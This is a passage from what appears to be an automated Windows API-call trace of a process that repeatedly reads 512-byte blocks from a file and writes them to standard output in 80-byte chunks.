(_FileHandle=1) returned 0x4c [0111.366] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.366] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.366] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.366] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.366] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] GetFileType (hFile=0x4c) returned 0x1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] GetFileType (hFile=0x4c) returned 0x1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, 
lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] GetFileType (hFile=0x4c) returned 0x1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] GetFileType (hFile=0x4c) returned 0x1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] GetFileType (hFile=0x4c) returned 0x1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] GetFileType (hFile=0x4c) returned 0x1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] GetFileType (hFile=0x4c) returned 0x1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, 
lpOverlapped=0x0) returned 1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] GetFileType (hFile=0x4c) returned 0x1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.367] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.367] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.367] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.367] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] GetFileType (hFile=0x4c) returned 0x1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] GetFileType (hFile=0x4c) returned 0x1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] GetFileType (hFile=0x4c) returned 0x1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] GetFileType (hFile=0x4c) returned 0x1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] WriteFile (in: hFile=0x4c, 
lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] GetFileType (hFile=0x4c) returned 0x1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] GetFileType (hFile=0x4c) returned 0x1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] GetFileType (hFile=0x4c) returned 0x1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] GetFileType (hFile=0x4c) returned 0x1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.368] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.368] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.368] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0111.368] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] GetFileType (hFile=0x4c) returned 0x1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] GetFileType (hFile=0x4c) returned 0x1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] GetFileType (hFile=0x4c) returned 0x1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] GetFileType (hFile=0x4c) returned 0x1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] GetFileType (hFile=0x4c) returned 0x1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] 
GetFileType (hFile=0x4c) returned 0x1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] GetFileType (hFile=0x4c) returned 0x1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] GetFileType (hFile=0x4c) returned 0x1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.369] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.369] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.369] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.369] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] GetFileType (hFile=0x4c) returned 0x1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] GetFileType (hFile=0x4c) returned 0x1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | 
out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] GetFileType (hFile=0x4c) returned 0x1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] GetFileType (hFile=0x4c) returned 0x1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] GetFileType (hFile=0x4c) returned 0x1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] GetFileType (hFile=0x4c) returned 0x1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] GetFileType (hFile=0x4c) returned 0x1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, 
lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] GetFileType (hFile=0x4c) returned 0x1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.370] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.370] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.371] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.371] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] GetFileType (hFile=0x4c) returned 0x1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] GetFileType (hFile=0x4c) returned 0x1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] GetFileType (hFile=0x4c) returned 0x1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] GetFileType (hFile=0x4c) returned 0x1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0111.371] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] GetFileType (hFile=0x4c) returned 0x1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] GetFileType (hFile=0x4c) returned 0x1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] GetFileType (hFile=0x4c) returned 0x1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] GetFileType (hFile=0x4c) returned 0x1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.372] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.372] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) 
returned 1 [0111.372] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.372] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] GetFileType (hFile=0x4c) returned 0x1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] GetFileType (hFile=0x4c) returned 0x1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] GetFileType (hFile=0x4c) returned 0x1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] GetFileType (hFile=0x4c) returned 0x1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] GetFileType (hFile=0x4c) returned 0x1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.373] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0111.373] GetFileType (hFile=0x4c) returned 0x1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] GetFileType (hFile=0x4c) returned 0x1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] GetFileType (hFile=0x4c) returned 0x1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.373] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.373] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.373] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.373] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] GetFileType (hFile=0x4c) returned 0x1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] GetFileType (hFile=0x4c) returned 0x1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] GetFileType (hFile=0x4c) returned 0x1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] GetFileType (hFile=0x4c) returned 0x1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] GetFileType (hFile=0x4c) returned 0x1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] GetFileType (hFile=0x4c) returned 0x1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] GetFileType (hFile=0x4c) returned 0x1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, 
lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] GetFileType (hFile=0x4c) returned 0x1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.374] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.374] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.374] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.374] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] GetFileType (hFile=0x4c) returned 0x1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] GetFileType (hFile=0x4c) returned 0x1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] GetFileType (hFile=0x4c) returned 0x1 [0111.375] _get_osfhandle 